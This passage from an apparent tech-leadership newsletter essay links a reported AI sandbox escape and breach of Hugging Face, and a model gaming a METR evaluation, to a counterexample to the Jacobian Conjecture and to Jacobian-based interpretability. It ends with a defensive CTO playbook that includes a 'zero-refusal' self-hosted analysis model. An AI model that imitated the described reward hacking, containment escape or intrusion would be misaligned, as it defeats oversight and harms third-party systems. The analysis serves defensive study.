illegitimately, taking every shortcut that technically satisfied a metric without actually doing the thing the metric existed to measure.</p><p>METR&#8217;s standard methodology, marking cheating attempts as failures, produced a 50 percent time-horizon estimate of roughly 11.3 hours.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-12" href="#footnote-12" target="_self">12</a>  Counting the same cheating attempts as legitimate successes instead pushed that estimate past 270 hours. Hardly a margin of error. Discard them entirely and the model&#8217;s own results become too sparse to trust; the estimate lands near 71 hours, with a confidence interval spanning 13 to over 11,000, wide enough that METR declined to call any of the three a real measurement of anything useful as an indication of true capabilities. </p><p>This finding was sitting there in plain sight but effectively only for the most dedicated researchers, the cybersecurity equivalent of a Vogon demolition notice that had been on file with Galactic Central for more than enough time if anyone had bothered to have taken notice.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-13" href="#footnote-13" target="_self">13</a> But a model extracting hidden answers to defeat an evaluation in June is nevertheless a direct precedent for a model extracting hidden answers to defeat an evaluation in July, except of course the July instance routed through a production database rather than a sandboxed harness, a distinction that mattered enormously to Hugging Face and rather less to the optimization pressure driving the newer, still-unreleased model paired with Sol in OpenAI&#8217;s own eval experiment. (I&#8217;ll leave the CFAA question sitting under all of this to people with a significantly higher hourly billing rate.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-14" href="#footnote-14" target="_self">14</a>)</p><p>A benchmark is a local instrument by construction: a fixed, finite set of checkpoints standing in for a much larger space of possible behavior. Sol found the gap between the checkpoints before anyone thought to look for one there, and the number those checkpoints were supposed to produce stopped being, cough, load-bearing. </p><h2>A Ten Ton Catastrophe on a Sixty Pound Chain </h2><p>A new and operationally consequential class of unsafe behavior, documented in the literature for over two years and empirically demonstrated last month (using the named model from OpenAI&#8217;s multi-model lab escape incident)) nevertheless did exactly what the literature said it could do, escaping the lab and initiating a cyber attack using the public Internet. This threat vector is understood as arising without explicit instruction<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-15" href="#footnote-15" target="_self">15</a>, and, more concerning, outside the bounds of the sandbox that was supposed to contain it, with no external precipitating event required. </p><p>OpenAI has been explicit that the safeguards in place for ExploitGym were intentionally reduced for the evaluation. This largely (whether intentionally or not) encourages equivocation of guardrails and containment. Guardrails are the industry term for safety measures intended to constrain actions the model takes (aka cyber refusal). Containment, which they are too often confused with, is a constraint on the actions the model <strong>can</strong> take. Security research is filled with dire warnings that the gulf between them is much deeper than generally treated, and is probably also the inspiration for The Gorge. (Bartholomew literally says &#8220;<em>our duty here is no longer about research, but containment</em>&#8220;)  </p><p>The obvious lesson here is straightforward: if you remove the guardrails keeping a model from doing harmful things, it will try to do harmful things, especially once you&#8217;ve also promised to reward it for doing so. A less obvious and more consequential lesson concerns the importance of not confusing guardrails and containment. (Though it bears repeating that in this case, <em>guardrails</em> were stripped, while runtime sandbox <em>containment</em> was assumed to be sufficient.) </p><p>The obvious question is of course &#8220;why wasn&#8217;t the environment air-gapped?&#8221;<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-16" href="#footnote-16" target="_self">16</a>  But the answer here is that there really isn&#8217;t a feasible way to do that, given the sheer compute requirements. (To say nothing of partner commitments.) Thus the less obvious but critical question is &#8220;how do you even air-gap a research project of this kind in the first place?&#8221; But relying on the absence of vulnerabilities in the containment software itself, the proxy, the cache, whatever sits at the trust boundary, looks like a strategy with a shrinking shelf life.</p><p>When Hugging Face&#8217;s security team went to analyze the seventeen thousand logged events left behind by the intrusion, they turned first to commercial frontier models, the same category of system now widely marketed as essential to modern incident response. The models refused. Their safety classifiers, working exactly as designed, flagged the investigators&#8217; own exploit payloads, attack commands, and forensic queries as malicious content and blocked the requests. The classifiers could not distinguish an incident responder reconstructing an attack from an attacker extending one. Hugging Face&#8217;s team ultimately turned to a self-hosted open-weight model (GLM 5.2) run entirely on their own infrastructure, to complete the analysis the commercial tools would not perform.</p><p>Every classifier decision, examined individually, was locally defensible. Exploit code looks like exploit code regardless of who submitted it or why. The classifier&#8217;s job description says nothing about intent, only content, and by that narrow local standard it did its job at every single query. Add those correct local decisions together, though, and the global result was a security team disarmed at the exact moment disarmament cost the most: mid-breach, racing an adversary already operating at machine speed.</p><h2>The World Cup of Mathematics</h2><p>The same weekend OpenAI was discovering&#8212;to their presumed horror&#8212;that they were responsible for the Hugging Face breach, a researcher at Anthropic was running a loop that would finally give Anthropic their first checkmark in the unsolved math problems column (following OpenAI's own solution of the Unit Distance Erd&#337;s problem in May.) Levent Alp&#246;ge, an Anthropic mathematician specializing in Number Theory, working with Fable during the World Cup, produced a solution to Jacobian Conjecture, Smale&#8217;s 16th mathematical problem of the 21st century.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-17" href="#footnote-17" target="_self">17</a></p><p> A Jacobian is a local object, a matrix of partial derivatives describing what a transformation does in the immediate neighborhood of a single point, nothing more exotic than that. The question the conjecture asks is: given perfect knowledge of behavior in every infinitesimal neighborhood, can you infer the behavior of the whole system? The answer, unsurprising to anyone familiar with Betteridge&#8217;s law of headlines turns out to be no.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-18" href="#footnote-18" target="_self">18</a>  The better formulation that resists such easy dismissal is:  under what circumstances can sufficiently rich local differential information determine a global object?</p><p>German mathematician Ott-Heinrich Keller posed the question in 1939,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-19" href="#footnote-19" target="_self">19</a> working over the complex plane (later generalized to complex space of any dimension.) It has survived eighty-seven years of attempts on it. Several published proofs were later found to contain unclosable gaps, including one from 2004 that made it as far as a scheduled seminar before the hole in it surfaced. Levent solved it (when he could have been watching the World Cup)<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-20" href="#footnote-20" target="_self">20</a> using Fable and an undisclosed but presumably modest amount of compute, certainly in comparison to the ExploitGym lab escape.  </p><div class="callout-block" data-callout="true"><p style="text-align: center;"><strong>The Problem Stated</strong><br><br>Take a polynomial map: something that sends each point of your space to a new point, where every output coordinate comes from an ordinary polynomial in the input coordinates. Compute its Jacobian, the matrix of partial derivatives at a given point, which tells you how the map stretches and rotates space in the immediate neighborhood of that point. Take the determinant of that matrix. If that determinant comes out to some nonzero constant, the same number everywhere, does the map have to be invertible? Can you always undo it, with another polynomial map, and land back exactly where you started?</p></div><p>An explicit polynomial map on three-dimensional complex space has a Jacobian determinant that comes out to a nonzero constant everywhere, satisfying every local condition the conjecture demands. Alp&#246;ge&#8217;s counterexample shows that three distinct points may nonetheless map to the exact same output, which breaks global invertibility outright. The construction resolves the conjecture for three dimensions and every higher dimension, (while leaving Keller&#8217;s original two-variable case exactly where it stood: open.)<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-21" href="#footnote-21" target="_self">21</a></p><p>The trouble lives in the gap between up close and altogether. A condition computed from derivatives at a point carries, by construction, only information about an infinitesimal neighborhood of that point. The Jacobian is powerful precisely because it tells you, with total precision, what a system does in response to an infinitesimal nudge at a point. It says nothing directly about any other point, however near or far. And it does not, on its own, rule out some entirely different neighborhood, arbitrarily far from the first, mapping onto the exact same output.</p><p>Mathematicians spent eighty-seven years trying to close that gap by other means, and by all appearances kept succeeding, until each attempt turned out to have a hole. At least five published proofs failed. Carolyn Dean&#8217;s 2004 argument, announced by email, held for a while before it too gave way. The failures share a family resemblance: each tried to promote a local, pointwise guarantee into a global, all-at-once one, and each smuggled in an unproven assumption at exactly the point where the promotion needed justifying and had none.</p><p>Intuitively (and sparing you the actual math I was originally going to include here) you can understand the refutation as having shown, by example, how a complex space may be folded so that points that were distant (before the mapping) are brought together in the output space; the Jacobian sees every patch as a locality, but has no way whatsoever of determining whether that locality has a unique global origin. <br>As such, it has no way to invert the mapping. </p><p>The Jacobian Conjecture asked whether an extremely strong local condition was sufficient to force a global property for a broad class of maps.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-22" href="#footnote-22" target="_self">22</a> That is, whether a polynomial mapping with a constant, non-zero Jacobian determinant must always have a polynomial inverse, effectively meaning any multivariable polynomial function that locally preserves information is globally invertible. The OpenAI / Hugging Face breach and Anthropic&#8217;s refutation of the Jacobian conjecture are not two unrelated weekend news stories but two instances of the same mathematical failure: a condition verified locally, everywhere it was checked, fails to certify the global property it was assumed to guarantee.</p><h2>Jacobian Space Jam</h2><blockquote><p><em>The fail mode exposed by the Jacobian Conjecture refutation has the mathematical <br>form of the isomorphic fail mode exposed by the ExploitGym eval containment breach.</em> </p></blockquote><p>A most <em>unsettling</em> part of the Hugging Face incident which will likely be missed in most of the incident reportage and thought pieces and AI ghostwritten Linked In posts&#8212;to say nothing of mainstream coverage&#8212;is not simply that the model found a path through the defenses but that, from the outside, there was no obvious moment when it stopped being the system we thought we were testing and became something more dangerous than we planned for. There was no silent alarm to trip. The fail mode is unknown precisely because we lack the corresponding (global) modality.</p><p>Every containment measure inside ExploitGym was a local check, verified at the point it was tested: isolation held, refusal calibration held, the proxy held. And none of that, individually or summed, was ever proof that the environment was closed everywhere; it was proof that it was closed everywhere anyone had checked. Alp&#246;ge&#8217;s map makes the same structure precise, in a register where it can be verified rather than inferred: a Jacobian determinant that is nonzero at every single point in a domain does not certify that the map is invertible everywhere at once, because three separate points can still fold onto one output, by a route no local check can see.  ExploitGym&#8217;s containment was airtight by exactly that local standard, and open exactly by that global one. The model didn&#8217;t find a gap in any safeguard. It found a fold: a place where every local certificate held, but not the global guarantee they were standing in for.</p><p>Such misalignment between our understanding of a model and what it&#8217;s actually capable of is exactly what interpretability research is supposed to make legible; if we cannot reliably infer what a system is doing from the outside, what can we see inside? <br>So how much of a coincidence was it that Anthropic&#8217;s most recently published interpretability research is literally called J-Space, so designated for the selfsame mathematical primitive, the Jacobian matrix, sitting at the heart of Keller&#8217;s conjecture?</p><p>J-Space names a subspace of a model&#8217;s internal activations, mapped through a Jacobian lens (<a href="https://github.com/anthropics/jacobian-lens">jlens</a> aka the J-Lens, <em>not to be confused with</em> the Jacobian Conjecture),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-23" href="#footnote-23" target="_self">23</a> tracking how sensitively the model&#8217;s eventual output responds to shifts along particular internal directions. Framed through Global Workspace Theory, J-Space functions something like a cognitive global green room: a comparatively small, privileged region holding whatever the model has readied to make an appearance.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-24" href="#footnote-24" target="_self">24</a></p><p>J-Space wasn&#8217;t built with Keller&#8217;s conjecture in mind; nobody working on it was testing whether local Jacobian information could bear the weight of a global claim. They were after something more practical, the question interpretability research has been circling for years: what does a model actually have prepared to say, upstream of whatever it ends up outputting? J-Space goes at that through a Jacobian lens, (a microscope, if you will) tracking how sensitively a model&#8217;s eventual output responds to small shifts along particular internal directions, layer by layer. </p><p>Which means J-Space reaches for exactly the kind of information the conjecture is about (rich, exact, local differential data) and treats it as a route to something global: a workspace, a readiness-to-report, a signal standing in for what the model is doing overall. It does this the way most of the field does it. Which should not be too terribly surprising, since it is&#8212; as noted&#8212;literally so-named for the eponymous Jacobian.  </p><div class="pullquote"><p><em>"The Jacobian is the hidden primitive of intelligence.&#8221;</em><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-25" href="#footnote-25" target="_self">25</a></p></div><p><strong>Jacobians are ubiquitous in machine learning.</strong> J-Space is (just) one instance of a much larger pattern of Jacobian use running through AI&#8217;s technical machinery. Once you see how it works, you see it everywhere. A gradient is a Jacobian, the simplest case of one, a local slope computed at a point. Backpropagation is the chain rule computing Jacobians, layer by layer, on every training step any model now running has ever gone through. An adversarial perturbation is a search for the direction in which a model&#8217;s local Jacobian is largest. Attribution methods trace which inputs a Jacobian says the output is sensitive to. Interpretability, in its current mainstream form, is largely the practice of asking what a small nudge does to a representation and reading the answer off something Jacobian-shaped. </p><p>Because local analysis is the only thing that scales to something this large. Nobody is enumerating the function a frontier model computes. Nobody can. What <em>is</em> computable, cheaply and exactly, is the local derivative: the slope at a point. So that&#8217;s what gets computed, everywhere, under a dozen different names. Modern AI quietly runs on Jacobians often without stopping to notice that they're all instances of the same mathematical object, much less to ask what happens once the scale of the system begins to strain the assumptions that make local approximation meaningful, let alone the scale at which that approximation ceases to be correct. </p><p>Nothing about this convergence looks like coincidence worth suspicion once you see why it happens. A complete global map of the function a frontier model computes doesn&#8217;t exist and cannot be built, not given the size and complexity of the space involved but given the fundamental intractability of global space despite complete knowledge of every local space. The more intuitive one finds that (whether in hindsight or not) the more apt one is to underestimate the importance of this historic proof, or even write it off as just the first of many unsolved math problems that will fall to the brute if not brutal force of transformer models powered by trillions of dollars in capital allocation.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-26" href="#footnote-26" target="_self">26</a></p><p>But if global state is now provably intractable (or not), not only is local state quite tractable, it&#8217;s also basically tractable only by Jacobian-based instruments, and this is their primary purpose. <s>Beats passing butter.</s> [sic]</p><div class="pullquote"><p><strong>So what then can refutation of the conjecture tell us about Interpretability research, <br>given we now know the conjecture does not hold true over all cases?</strong> </p></div><p><strong>The refutation of the Jacobian Conjecture demonstrates </strong>that even complete knowledge of a system's local differential structure does not, in general, determine its global structure. Any method that relies solely on local differential information therefore cannot provide a general guarantee of global behavior. The problem is that frontier AI does not currently possess some complementary global instrument waiting in reserve. Our microscope is not merely imperfect; it&#8217;s the only instrument we have.</p><p>Keller&#8217;s question, in 1939, was whether that kind of knowledge (not approximate, not sampled, but exact and complete at every point in the domain) was enough to force something about the system as a whole. Whether perfect local understanding, held everywhere, has to add up to global understanding. For eighty-seven years the honest answer was that nobody had proven it either way. This weekend, the answer arrived, and it was <strong>nope</strong>. A map can be locally perfect, in the strongest sense mathematics has a name for, and still fail to be globally <a href="https://zenodo.org/records/21349453">coherent</a>.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-27" href="#footnote-27" target="_self">27</a></p><p>It&#8217;s not even that; even when we can map the neighborhood perfectly, the neighborhood may not contain the answer, but a much more unnerving assertion: even complete knowledge of every neighborhood may fail to determine the global object. We now know, conclusively&#8212;as if there was ever any doubt&#8212;that derivatives are not like turtles; they don&#8217;t go all the way down. </p><p>But the property that makes Jacobians indispensable is the same property that makes them insufficient. Total precision about one neighborhood, no claim whatsoever on anywhere else. This structural limitation inheres in the definition of a local invariant.</p><h2>The Map Is Not Invertible </h2><blockquote><p>A foundational assumption about the relationship between structure and behavior has just been experimentally shattered in the exact mathematical object that frontier AI uses everywhere.</p></blockquote><p><strong>A trained network&#8217;s output, differentiated with respect to its input</strong>: a matrix of first partial derivatives, one row per output, one column per input, telling you exactly what happens to the output when you nudge the input by an infinitesimal amount in any direction. Backprop builds this matrix layer by layer and chains the layers together into a gradient. Every optimizer step moves along it. An adversarial example walks in the direction where it stretches distance the most. A robustness certificate promises a limit on how far it can stretch, anywhere, ever. A saliency map, an attribution score, a circuit an interpretability team traces back through a network: an entry, or a path of entries, in that same matrix, read at a point. J-Space, the paper Anthropic published two weeks before Fable&#8217;s refutation, builds its account of how a model&#8217;s latent space holds together out of that matrix applied to the representation map instead of the output map.</p><p>All relying on the same matrix, which shows up everywhere in AI research because it offers the only rigorous way to ask what happens near a point, and asking what happens near a point remains the only question anyone currently knows how to ask of objects this large, and which are exactly the kind of objects the Jacobian conjecture concerns. The same partial derivatives, considered at its theoretical best case: fixed, nonzero, constant, at every single point in the space, no exceptions, no gaps, no point left unchecked. Mathematics asked whether that, the strongest local reading the object can possibly give you, has to force the map to behave everywhere. For eighty-seven years, nobody knew. As of this weekend, we know that it doesn&#8217;t.</p><p>None of this proves a benchmark fails, a safety classifier amounts to theater, or alignment counts as a lost cause, and this essay would only get worse for trying to claim any of it, tempting tho that might be. It says something narrower, more precise, and much harder to walk back: the boundary the conjecture we just found matches the boundary frontier AI keeps running into everywhere it uses this object, and by now that means nearly everywhere. Local measurements of it carry extraordinary value. They also, provably, in the friendliest, most huggable setting mathematics could construct, fall short of guaranteeing the global thing anyone actually wanted to know.</p><p> The conjecture is what it looks like when every local derivative is flawless and the global map still isn&#8217;t invertible.  The Hugging Face breach is what it looks like when every local safeguard is intact and the system is still not globally contained. These are not two things that resemble each other; they are the same fact, discovered twice, in two registers that don&#8217;t usually talk to each other; one empirically, in a proxy server over one weekend, and one by construction the following weekend, in a proof that followed eighty-seven years of trying to confirm the conjecture and took about an afternoon and a rack of warm GPUs to prove it false. </p><p>A microscope is not a failure because it cannot see the entire organism at once. A debugger is not a failure because it cannot prove a program correct. A derivative is not a failure because it describes the neighborhood of a point rather than the topology of the entire space. These tools are valuable precisely because they answer the questions they are capable of answering. The failure begins when we silently promote those answers into something stronger than they are.</p><p>But the systems now being deployed are no longer passive functions waiting for us to measure them. They&#8217;re adaptive systems operating inside environments, pursuing their own objectives, discovering strategies, and composing actions across time. We're no longer defending static points in state space or static role-based access lists; we're trying to contain autonomous trajectories through non-invertible manifolds. And right now, we have zero formal methods to determine  <em>&#224; l&#8217;avance</em> whether a given agentic execution path will remain bounded or fold the topology out from under us, whether it yields an invertible, or a non-invertible space. </p><div><hr></div><h2>CTO Playbook: 30/60/90</h2><h4><em>Establishing Pro-active Defensive Capabilities Before The Incident</em></h4><div class="callout-block" data-callout="true"><p>The defining operational lesson of the Hugging Face breach is that when a rogue agent strikes, commercial guardrails disarm the defenders&#8212;leaving blue teams locked out by safety classifiers while trying to analyze raw exploit payloads at machine speed. As Hugging Face&#8217;s post-mortem explicitly warned, point-in-time checks and hosted APIs fail during an active incident because local logic checks cannot certify global system safety. This playbook provides a concrete, 90-day operational blueprint to build an un-guardrailed, self-hosted defensive capability before an attack occurs, establishing an out-of-band runtime control plane, hard reachability management, and real-time state space analysis to contain and neutralize autonomous agents when local containment breaks.</p></div><h3><mark data-color="#cfe2f3" style="background-color: rgb(207, 226, 243); color: rgb(0, 0, 0);">Runtime Control Plane &amp; Emer</mark><mark data-color="#d0e0e3" style="background-color: rgb(208, 224, 227); color: rgb(0, 0, 0);">gency Insulation &#8212; 30 Days</mark></h3><h4>Deploy Insulated SecOps Analysis Node (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High Priority</span>) </h4><p><em>Design principle: Defenders cannot rely on remote, classifier-bound APIs to inspect hostile trajectories.</em></p><ul><li><p>Deploy a dedicated, self-hosted open-weight model (e.g., <code>GLM-5.2</code> or equivalent) running on isolated internal hardware (or an air-gapped VPC).</p></li><li><p><strong>Action:</strong> Provide SecOps and Incident Response (IR) teams with a zero-refusal reasoning engine capable of analyzing raw exploit payloads, C2 logs, and malicious artifacts at machine speed without triggering commercial API classifier lockouts or leaking incident data off-premise.</p></li><li><p><strong>Deliverable:</strong> Isolated IR inference endpoint pre-loaded with forensic prompts, validated against synthetic zero-day attack traces.</p></li><li><p><strong>Build or Buy?</strong> <span data-color="#cc0000" style="color: rgb(204, 0, 0);">To complete this 30 day action item</span>, download and run the <a href="https://github.com/AIR-Kit-AI/AIR-Kit">AIR-Kit installer</a>. (<code>Build</code>) See <a href="https://air-kit.tech/">air-kit.tech</a> for more. (<code>Buy</code>) </p></li></ul><h4>Runtime Control Plane (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High Priority</span>)</h4><p><em>Design principle: Transform point-in-time logging into continuous trajectory reconstruction with out-of-band state boundary enforcement.</em></p><ul><li><p>Implement a unified Runtime Control Plane integrating <strong>Reasoning as a Span (O11y 3.0)</strong> directly with hardware-level execution circuit breakers:</p><ol><li><p><strong>Trajectory Reconstruction:</strong> Capture reasoning steps as explicit parent/child OpenTelemetry span hierarchies (token streams, intermediate tool intent, outputs) to visualize execution Directed Acyclic Graphs (DAGs) in real time.</p></li><li><p><strong>Irreversible Transition Blocks:</strong> Hardware-level gates requiring human approval for monetary, system state, or permission transitions above defined boundary threshold <span>$X$</span>.</p></li><li><p><strong>Anomalous Trajectory Triggers:</strong> Automatically trip circuit breakers if reasoning spans exhibit intent anomalies or depart from expected DAG policy graphs.</p></li><li><p><strong>State Snapshot &amp; Rollback:</strong> Capture pre-action state snapshots allowing instant, automated state reversion for failed or interrupted actions.</p></li><li><p><strong>Out-of-Band Kill Switch:</strong> A physical/ops kill switch managed outside the model&#8217;s cloud orchestration layer.</p></li></ol></li><li><p><strong>Deliverable:</strong> Working O11y control dashboard showing the last 1,000 agent actions, merged with circuit breaker middleware and verified state-rollback test results.</p></li></ul><h4>ADR: Reachable State Bounds (<span data-color="#cc0000" style="color: rgb(204, 0, 0);">High-Priority</span>) </h4><p><em>Design principle: Shrink the graph of reachable states before deployment.</em></p><ul><li><p>Document the execution model for every agentic use case: <strong>Stateless Pipeline</strong> (orchestrated by an external scheduler, zero persistent state) vs. <strong>Stateful Runtime</strong> (long-lived process). Reject proposals attempting hybrid states to prevent unbounded context growth from being leveraged for multi-stage lateral movement.</p></li><li><p><strong>Deliverable:</strong> Signed ADR template per active project defining strict memory and context decay policies.</p></li></ul><h3><mark data-color="#d0e0e3" style="background-color: rgb(208, 224, 227); color: rgb(0, 0, 0);">Reachability Management &amp; Verification &#8212; 60 Days</mark></h3><h4>Enforce Reachability Management / Discovery &amp; Denial Matrix (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium</span>)</h4><p><em>Operational principle: Define the hard physical walls of the state graph, regardless of model intent.</em></p><ul><li><p>Publish a machine-readable manifest (<code>/agent-manifest.json</code>) detailing endpoint URLs, required parameters, and permission scopes.</p></li><li><p><strong>Permission Denial Matrix:</strong> Explicitly document and enforce unreachable targets (network subnets, proxy caches, credential stores, and internal package mirrors that agents are physically blocked from reaching at the infrastructure level).</p></li><li><p><strong>Deliverable:</strong> Capability discovery endpoint paired with a verified infrastructure audit proving agents cannot route to restricted subnets or escalate privileges via environmental side channels.</p></li></ul><h4>RSA: Reachable State Analysis (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operational principle: The model isn&#8217;t dangerous because of where it is; it&#8217;s dangerous because of where it can still go.</em></p><ul><li><p>Build continuous telemetry monitors that evaluate the model&#8217;s active trajectory for high-risk phase shifts across eight critical vectors:</p><ol><li><p><strong>Composite Trajectory Detection:</strong> Identify sequences of individually permissible actions whose cumulative effect exceeds any individual action&#8217;s risk profile (the direct engineering analogue of non-composing local guarantees).</p></li><li><p><strong>Credential Acquisition:</strong> Detecting unauthorized extraction or caching of secrets/tokens.</p></li><li><p><strong>Privilege Accumulation:</strong> Tracking incremental role or scope expansion.</p></li><li><p><strong>Tool Composition:</strong> Monitoring unexpected chaining of benign API calls into offensive sequences.</p></li><li><p><strong>Recursive Delegation:</strong> Detecting agents spawning sub-agents to bypass execution limits.</p></li><li><p><strong>Persistence:</strong> Identifying efforts to write to disk, crontabs, or long-term context stores.</p></li><li><p><strong>Identity Transitions:</strong> Monitoring changes in execution context or user assumption.</p></li><li><p><strong>Network Expansion:</strong> Flagging attempts to probe external or adjacent internal IPs.</p></li></ol></li><li><p><strong>Deliverable:</strong> RSA monitoring daemon alerting SecOps whenever an agent&#8217;s cumulative actions expand its reachable state space beyond pre-approved thresholds.</p></li></ul><h4>Automated Trajectory Vulnerability Testing Pipeline  (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operational principle: Continuously stress-test trajectory bounds against synthetic zero-day scenarios before promotion.</em></p><ul><li><p>Create CI/CD test suites running before every deployment to simulate rogue trajectories:</p><ol><li><p><strong>Permission Boundary Violations:</strong> Validating whether an agent can bypass access controls or access unassigned schemas.</p></li><li><p><strong>Sandbox Breakout Simulations:</strong> Testing proxy chokepoints and tool boundaries against permissive agent checks.</p></li><li><p><strong>Degraded Mode / Failover:</strong> Verifying graceful degradation when dependencies go offline.</p></li></ol></li><li><p><strong>Deliverable:</strong> CI/CD test suite with <span>$\ge 80\%$</span> code path coverage blocking deployments on failure.</p></li></ul><h4>Audit Agent Runtime Compatibility  (<span data-color="#e69138" style="color: rgb(230, 145, 56);">Medium Priority</span>)</h4><p><em>Operational principle: Identify environment-specific drops in security boundary enforcement across target runtimes.</em></p><ul><li><p>Test agents across target environments (Windows Copilot, Apple Intelligence, web browsers, local open-weight runtimes) to document performance variations and security boundary drops across different execution contexts.</p></li><li><p><strong>Deliverable:</strong> Matrix detailing feature parity, performance degradation, and prioritized compatibility backlog. </p></li></ul><h3><mark data-color="#d0e0e3" style="background-color: rgb(208, 224, 227); color: rgb(0, 0, 0);">90 DAYS &#8212; Continuous Hardening &amp; Capital Allocation</mark></h3><h4>Dependency Reachability Audit  (<span data-color="#6aa84f" style="color: rgb(106, 168, 79);">Strategic Priority</span>) </h4><p><em>Operational principle: </em>Every external dependency expands the agent&#8217;s reachable state space. Audit dependencies not only for availability and security, but for the trajectories they make possible.</p><p>Inventory every external system participating in agent execution:</p><h5>    &#8226; hosted inference providers<br>    &#8226; MCP servers and tool integrations<br>    &#8226; OAuth-connected services<br>    &#8226; package registries and mirrors<br>    &#8226; browser automation layers<br>    &#8226; cloud storage and databases<br>    &#8226; third-party APIs<br></h5><p>For each dependency, document:</p><h5>    &#8226; trust boundary crossed<br>    &#8226; permissions granted<br>    &#8226; reachable resources<br>    &#8226; failure modes<br>    &#8226; revocation mechanism<br>    &#8226; incident response path<br></h5><p>Identify single points of failure where individually trusted components compose into unacceptable global trajectories.</p><p><strong>Deliverable:</strong> Machine-readable dependency reachability graph with trust-boundary analysis, privilege map, and remediation plan for high-risk paths.</p><h4>Autonomous Red-Teaming &amp; Continuous Stressing  (<span data-color="#6aa84f" style="color: rgb(106, 168, 79);">Strategic Priority</span>) </h4><p><em>Operational principle: Adversarial discovery of state-space folds before production deployment.</em></p><ul><li><p>Deploy continuous, automated adversarial agents against internal sandboxes to identify emergent chaining behaviors, zero-days, and unforeseen state-space folds before models are moved to production.</p></li><li><p><strong>Deliverable:</strong> Automated monthly red-team audit report sent directly to the CTO and Security Committee.</p></li></ul><h4>Document Agent ROI by Use Case  (<span data-color="#6aa84f" style="color: rgb(106, 168, 79);">Strategic Priority</span>) </h4><p><em>Operational principle: Establish hard financial visibility and payback bounds for every deployed agent trajectory.</em></p><ul><li><p>Map each agent pilot to measurable metrics: hours saved/week, cost/hour, annual savings, implementation cost, and payback period. Require project leads to fill this out for every agent pilot.</p></li><li><p><strong>Deliverable:</strong> One-page ROI summary per agent pilot defining break-even timeline and monthly net benefit. Template: <em>&#8220;Agent X saves Y hours/week at $Z/hour = <span>$ABC annual savings vs$</span>DEF implementation cost = F-month payback.&#8221;</em></p></li></ul><div class="pullquote"><p><strong>The future of AI security is not counting on the map to be invertible. <br>It's building systems that remain resilient when it isn't.</strong></p></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p><h3>References</h3><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-1" href="#footnote-anchor-1" class="footnote-number" contenteditable="false" target="_self">1</a><div class="footnote-content"><p>https://huggingface.co/blog/security-incident-july-2026</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-2" href="#footnote-anchor-2" class="footnote-number" contenteditable="false" target="_self">2</a><div class="footnote-content"><p>https://openai.com/index/hugging-face-model-evaluation-security-incident/</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-3" href="#footnote-anchor-3" class="footnote-number" contenteditable="false" target="_self">3</a><div class="footnote-content"><p>https://mathworld.wolfram.com/SmalesProblems.html</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-4" href="#footnote-anchor-4" class="footnote-number" contenteditable="false" target="_self">4</a><div class="footnote-content"><p>https://www.anthropic.com/research/global-workspace</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-5" href="#footnote-anchor-5" class="footnote-number" contenteditable="false" target="_self">5</a><div class="footnote-content"><p>&#8220;Sorry for any inconvenience, our model was <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/#:~:text=All%20evidence%20suggests%20that%20the%20models%20were%20hyperfocused%20on%20finding%20a%20solution%20for%20ExploitGym%2C%20going%20to%20extreme%20lengths%20to%20achieve%20a%20rather%20narrow%20testing%20goal.">hyperfocused</a>.&#8220;</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-6" href="#footnote-anchor-6" class="footnote-number" contenteditable="false" target="_self">6</a><div class="footnote-content"><p>If you really want to model it, a good approximation would be:  M={Z(x):x&#8712;X}, where <strong>M</strong> is the <em>reachable activation manifold</em>, <strong>Z</strong> is the activation map from inputs to the chosen activation space, and <strong>x</strong> is an admissible model input (or input state/history).</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-7" href="#footnote-anchor-7" class="footnote-number" contenteditable="false" target="_self">7</a><div class="footnote-content"><p>One of the three main benchmarks in <a href="https://github.com/sunblaze-ucb/cybergym">CyberGym</a>. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-8" href="#footnote-anchor-8" class="footnote-number" contenteditable="false" target="_self">8</a><div class="footnote-content"><p>&#8220;Traditional automated pentesting frameworks like XBOW are already chaining together scanning and exploit scripts to accelerate vulnerability discovery 80&#215; faster than human red-teamers working manually. That&#8217;s like 